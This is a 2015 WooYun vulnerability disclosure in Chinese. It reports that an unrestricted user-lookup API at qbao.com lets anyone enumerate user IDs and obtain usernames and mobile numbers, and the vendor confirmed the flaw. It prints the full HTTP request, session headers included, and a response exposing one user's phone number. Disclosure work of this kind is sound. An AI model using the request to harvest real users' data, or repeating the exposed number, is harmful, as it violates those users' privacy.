漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0150462
漏洞标题:钱宝API接口设计部当,泄露所用注册用户的用户名,手机号等信息
相关厂商:qbao.com
漏洞作者: 小开
提交时间:2015-10-30 10:43
修复时间:2015-12-15 13:20
公开时间:2015-12-15 13:20
漏洞类型:敏感信息泄露
危害等级:中
自评Rank:8
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-30: 细节已通知厂商并且等待厂商处理中
2015-10-31: 厂商已经确认,细节仅向厂商公开
2015-11-10: 细节向核心白帽子及相关领域专家公开
2015-11-20: 细节向普通白帽子公开
2015-11-30: 细节向实习白帽子公开
2015-12-15: 细节向公众公开
简要描述:
API接口设计不当,导致可遍历所有用户,查询对应的用户名,手机号等信息
详细说明:
接口调用没加限制,可通过遍历userId获取所用户名,昵称,手机号等信息
接口: GET /api/users/25004061 HTTP/1.1
GET /api/users/25004061 HTTP/1.1
Host: im.qbao.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-Hans-CN;q=1
Response-Content-Type: text/html
jSessionId: D12A73CB04ACE1094527EB6E3E9FB9EB.jvm_34
User-Agent: qbaonew-ios/3.1.8
channel: App Store
Accept-Encoding: gzip, deflate
userId: 20001575
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
devId: 61506C07-1D3E-44F2-9533-6EA7C50A9844
version: 3.1.8
Connection: close
devType: iphone
Proxy-Connection: keep-alive
Hash: 4A57CCA503892BF97D3C03B2577A9DA89D3471E6
sourceType: client
HTTP/1.1 200 OK
Server: Tengine/1.5.2
Date: Wed, 28 Oct 2015 14:07:18 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 353
Connection: close
Etag: "e6071785f233974de7b9b51de042bd08722abae4"
{"errorCode": null, "errorMsg": "", "data": {"user": {"province": "", "city": "", "updateTime": 1000, "isAuth": true, "userName": "15043755288", "nickName": "150***88", "mobile": "15043755288", "friendship": 0, "userId": 25004061, "avatarPic": "http://user.qbcdn.com/user/avatar/queryAvata65/25004061/nosrc/1000", "id": 25004061}}, "responseCode": 1000}
漏洞证明:
修复方案:
增加限制
版权声明:转载请注明来源 小开@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-10-31 13:19
厂商回复:
非常感谢!已经提交给 我爱乌云 。
最新状态:
暂无